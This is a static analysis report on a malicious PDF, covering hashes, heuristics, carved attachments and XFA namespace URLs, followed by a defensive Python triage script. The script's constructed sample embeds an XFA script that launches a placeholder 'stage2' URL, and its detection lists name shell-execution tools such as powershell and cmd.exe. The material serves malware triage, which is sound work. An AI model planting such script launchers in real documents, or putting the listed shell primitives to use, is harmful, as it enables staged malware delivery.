Malicious PDF — malware analysis report

Static analysis result for SHA-256 96b2a0ae1f703534…

Verdict: MALICIOUS
File type: PDF
Size: 35.8 KB
MD5:     0fdfbaed19ea838b3bba0a869e7d910b
SHA-1:   ec8cad6b9062946bf1f735c4dec335801a344b4e
SHA-256: 96b2a0ae1f703534c2261ddc2ac27205ec74af467a8dbb00d8286e1687cca246
Risk score: 66

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1553 Subvert Trust Controls

The PDF was flagged as malicious by the ML classifier with a score of 1.0000. It carries six embedded file attachments (object 14 alone is 33,928 bytes of the 35.8 KB sample) and a script payload inside a stream, a combination used to hide code and stage it for execution. An XFA form packet is also present; XFA can contain script logic and has been abused for exploitation. The excerpt does not reveal what the script does: the heuristic below notes that the <script> tag is not accompanied by Windows shell-execution primitives, so a second-stage downloader is plausible but not confirmed by the static evidence. The four extracted URLs are XFA namespace identifiers that every XFA form carries by design, not network indicators.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • Embedded script payload in PDF stream    medium    PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives; this is common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file    low    PDF_EMBEDDED
    The PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • XFA form    low    PDF_XFA
    The PDF uses XML Forms Architecture (XFA), which can contain script logic.
  • Embedded URL    info    EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All four URLs below are XFA namespace identifiers (the XDP, XFA config, template and data schemas) that every XFA form carries by design; none is a network indicator.
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xci/1.0/
    • http://www.xfa.org/schema/xfa-template/2.5/
    • http://www.xfa.org/schema/xfa-data/1.0/

Extracted artifacts (6)

Files carved from inside the sample during analysis.

embedded_file_obj0008.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 8 at offset 0xC6
    Size:    46 bytes
    SHA-256: 0a2224c4023b216235b61c3fc4dd17bbfac1ab23a545687f51b97604cf654712

embedded_file_obj0009.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 9 at offset 0x138
    Size:    671 bytes
    SHA-256: da6f875b44743569d80ece9274d5552cd72b9c791af7a325576360ec1b6218ee

embedded_file_obj0010.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 10 at offset 0x41C
    Size:    150 bytes
    SHA-256: b03c3f0447baa63e9ea525da2000a20b77f4cbd001a976ac125c18bd97f4d07c

embedded_file_obj0011.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 11 at offset 0x4F7
    Size:    437 bytes
    SHA-256: 919311c4f3a5f8d631c55fffd296ccf550fdb5d7b4350edc85e72b711cfc5686

embedded_file_obj0012.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 12 at offset 0x6F1
    Size:    181 bytes
    SHA-256: 072090be5ea6c4a216543a1d4332d27d322264f3038bbd986db2a09048143a1c

embedded_file_obj0014.bin
    Kind:    pdf-embedded-file
    Source:  PDF EmbeddedFile object 14 at offset 0x7EC
    Size:    33928 bytes
    SHA-256: b2c1c4cd9b67904c102bb26c2748cddabf1754c067ee3763df3e1940bb31691d

Object 14 (33,928 bytes) accounts for nearly all of the 35.8 KB sample; the other five attachments total 1,485 bytes. Each artifact should be triaged on its own (file type, hashes, nested documents) before any conclusion is drawn about the script payload.
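To reproduce the checks behind the heuristics above (a <script> tag inside stream data, the "shell-execution primitives" distinction that keeps the finding at medium severity, embedded file carving with per-object offsets and SHA-256 as in the artifact table, XFA presence, and URL extraction that separates XFA namespace URIs from real network indicators), here is an added example in Python using only the standard library. It is not the analysis platform's own tooling and its severity mapping is an assumption. The PDF it scans is built inline as a constructed sample; the attachment bytes and the URL http://example.invalid/stage2 are placeholders, not artifacts from the analysed file.

```python
"""Static PDF triage mirroring the report's heuristics (added example, stdlib only)."""
import hashlib
import re
import zlib

# Simplified object/stream grammar: adequate for triage, not a full PDF parser.
# Binary stream data that happens to contain "endobj" or "endstream" would cut a
# match short, so treat the results as leads, not proof.
OBJ_RE = re.compile(rb'(\d+)\s+(\d+)\s+obj\b(.*?)endobj', re.DOTALL)
STREAM_RE = re.compile(rb'stream\r?\n(.*?)\r?\nendstream', re.DOTALL)
URL_RE = re.compile(rb'https?://[^\s<>"\'\)\]]+')
SCRIPT_RE = re.compile(rb'<script\b', re.IGNORECASE)

# XFA/XMP namespace URIs appear in every XFA document by design; they are not C2.
NAMESPACE_PREFIXES = (b'http://ns.adobe.com/', b'http://www.xfa.org/', b'http://www.w3.org/')
# Tokens that would raise an embedded script from "review" to "high" (assumed severity model).
SHELL_TOKENS = (b'cmd.exe', b'powershell', b'WScript.Shell', b'ShellExecute', b'rundll32')
# Dictionary keys that hand control to script or to external programs.
ACTION_KEYS = (b'/JavaScript', b'/JS', b'/Launch', b'/OpenAction', b'/AA')


def decode_stream(raw, dictionary):
    """Inflate FlateDecode streams; other filters are returned raw for byte scanning."""
    if b'/FlateDecode' in dictionary:
        try:
            return zlib.decompress(raw)
        except zlib.error:
            return raw  # damaged or obfuscated stream: scan the raw bytes anyway
    return raw


def triage_pdf(data):
    """Scan raw PDF bytes and return the features the report's heuristics key on."""
    report = {
        'xfa': b'/XFA' in data,
        'action_keys': sorted(k.decode() for k in ACTION_KEYS if k in data),
        'embedded_files': [],
        'script_streams': [],
        'shell_primitives': False,
        'namespace_urls': set(),
        'external_urls': set(),
    }
    for m in OBJ_RE.finditer(data):
        objnum, body = int(m.group(1)), m.group(3)
        sm = STREAM_RE.search(body)
        if not sm:
            continue
        dictionary = body[:sm.start()]
        payload = decode_stream(sm.group(1), dictionary)
        if b'/EmbeddedFile' in dictionary:
            report['embedded_files'].append({
                'obj': objnum,
                'offset': m.start(),  # file offset of "N G obj", as in the artifact table
                'size': len(payload),
                'sha256': hashlib.sha256(payload).hexdigest(),
            })
        if SCRIPT_RE.search(payload):
            report['script_streams'].append(objnum)
            if any(tok in payload for tok in SHELL_TOKENS):
                report['shell_primitives'] = True
        for url in URL_RE.findall(payload):
            bucket = 'namespace_urls' if url.startswith(NAMESPACE_PREFIXES) else 'external_urls'
            report[bucket].add(url.decode('ascii', 'replace'))
    return report


def heuristic_flags(report):
    """Map triage features onto the report's flag identifiers (severities assumed)."""
    flags = []
    if report['script_streams']:
        flags.append(('PDF_EMBEDDED_SCRIPT_PAYLOAD', 'high' if report['shell_primitives'] else 'medium'))
    if report['embedded_files']:
        flags.append(('PDF_EMBEDDED', 'low'))
    if report['xfa']:
        flags.append(('PDF_XFA', 'low'))
    if report['namespace_urls'] or report['external_urls']:
        flags.append(('EMBEDDED_URL', 'info'))
    return flags


SAMPLE_ATTACHMENT = b'MZ\x90\x00placeholder-not-a-real-pe'  # constructed, not the real artifact


def build_sample():
    """Constructed sample PDF (not the analysed file): one EmbeddedFile plus an XFA packet with a script."""
    xfa_xml = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
               b'<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">'
               b'<script contentType="application/x-javascript">'
               b'app.launchURL("http://example.invalid/stage2");</script>'  # placeholder URL
               b'</template></xdp:xdp>')
    xfa_flate = zlib.compress(xfa_xml)
    objs = [
        b'<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 4 0 R >> '
        b'/Names << /EmbeddedFiles << /Names [(a.bin) 3 0 R] >> >> >>',
        b'<< /Type /Pages /Kids [] /Count 0 >>',
        b'<< /Type /EmbeddedFile /Length %d >>\nstream\n' % len(SAMPLE_ATTACHMENT)
        + SAMPLE_ATTACHMENT + b'\nendstream',
        b'<< /Length %d /Filter /FlateDecode >>\nstream\n' % len(xfa_flate)
        + xfa_flate + b'\nendstream',
    ]
    out = b'%PDF-1.7\n'
    for num, body in enumerate(objs, start=1):
        out += b'%d 0 obj\n' % num + body + b'\nendobj\n'
    return out + b'trailer\n<< /Root 1 0 R >>\n%%EOF\n'


if __name__ == '__main__':
    rep = triage_pdf(build_sample())
    for name, sev in heuristic_flags(rep):
        print(f'{sev:6} {name}')
    for ef in rep['embedded_files']:
        print(f"object {ef['obj']} at offset {ef['offset']:#x}: {ef['size']} bytes sha256={ef['sha256']}")
    print('external URLs:', sorted(rep['external_urls']))
```

Run it against a real sample with `triage_pdf(open(path, 'rb').read())`. The sample built here trips the same four flags as the report, and because its script carries no shell-execution tokens the script finding stays at medium, while the placeholder launchURL target lands in `external_urls` and the two XFA namespace URIs are filed separately, which is the split an analyst needs before treating any extracted URL as an indicator.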